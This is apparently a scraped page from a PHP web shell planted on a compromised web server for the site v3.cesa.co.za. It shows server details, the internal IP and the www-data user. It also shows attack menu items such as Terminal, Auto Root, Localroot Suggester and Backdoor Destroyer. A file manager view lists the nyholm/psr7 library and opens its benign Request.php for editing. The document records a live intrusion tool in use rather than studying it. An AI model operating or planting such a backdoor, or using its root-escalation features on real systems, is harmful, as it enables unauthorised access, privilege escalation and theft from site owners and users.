Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
nyholm /
psr7 /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
Factory
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
MessageTrait.php
7.25
KB
-rwxrwxr-x
2024-09-09 07:06
Request.php
1.32
KB
-rwxrwxr-x
2024-09-09 07:06
RequestTrait.php
2.9
KB
-rwxrwxr-x
2024-09-09 07:06
Response.php
4.18
KB
-rwxrwxr-x
2024-09-09 07:06
ServerRequest.php
4.78
KB
-rwxrwxr-x
2024-09-09 07:06
Stream.php
10.94
KB
-rwxrwxr-x
2024-09-09 07:06
StreamTrait.php
1.44
KB
-rwxrwxr-x
2024-09-09 07:06
UploadedFile.php
5.4
KB
-rwxrwxr-x
2024-09-09 07:06
Uri.php
9.51
KB
-rwxrwxr-x
2024-09-09 07:06
Save
Rename
<?php declare(strict_types=1); namespace Nyholm\Psr7; use Psr\Http\Message\{RequestInterface, StreamInterface, UriInterface}; /** * @author Tobias Nyholm <tobias.nyholm@gmail.com> * @author Martijn van der Ven <martijn@vanderven.se> * * @final This class should never be extended. See https://github.com/Nyholm/psr7/blob/master/doc/final.md */ class Request implements RequestInterface { use MessageTrait; use RequestTrait; /** * @param string $method HTTP method * @param string|UriInterface $uri URI * @param array $headers Request headers * @param string|resource|StreamInterface|null $body Request body * @param string $version Protocol version */ public function __construct(string $method, $uri, array $headers = [], $body = null, string $version = '1.1') { if (!($uri instanceof UriInterface)) { $uri = new Uri($uri); } $this->method = $method; $this->uri = $uri; $this->setHeaders($headers); $this->protocol = $version; if (!$this->hasHeader('Host')) { $this->updateHostFromUri(); } // If we got no body, defer initialization of the stream until Request::getBody() if ('' !== $body && null !== $body) { $this->stream = Stream::create($body); } } }